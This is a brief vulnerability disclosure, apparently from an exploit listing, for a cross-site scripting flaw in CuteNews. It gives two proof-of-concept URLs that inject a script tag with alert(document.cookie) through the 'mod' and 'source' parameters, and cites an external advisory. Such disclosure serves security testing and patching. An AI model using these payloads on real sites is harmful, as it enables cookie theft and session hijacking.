Local XSS attack: http://localhost/cutenews/index.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- http://localhost/cutenews/index.php?mod=editnews&action=list&source=<script>alert (document.cookie)</script><!-- advisory:http://www.aria-security.net/advisory/portals/cutenews.txt